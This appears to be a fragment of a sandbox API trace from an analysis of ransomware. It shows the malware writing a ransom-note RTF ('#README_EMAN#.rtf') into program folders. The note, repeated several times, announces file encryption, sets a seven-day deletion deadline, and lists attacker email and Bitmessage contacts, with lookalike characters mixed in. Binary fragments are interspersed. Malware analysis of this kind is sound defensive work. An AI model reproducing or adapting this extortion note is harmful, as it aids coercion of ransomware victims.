\\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x9fê\x01MË2»Ta\\Ö\x9c*``i\x1dAÄà\x99Ö\x06Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0218.217] WriteFile (in: hFile=0x228, lpBuffer=0x1f4ac18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4ac18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0218.218] CloseHandle (hObject=0x228) returned 1 [0218.218] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\features\\#readme_eman#.rtf")) returned 0xffffffff [0218.218] GetLastError () returned 0x2 [0218.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\features\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0218.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0218.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0218.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 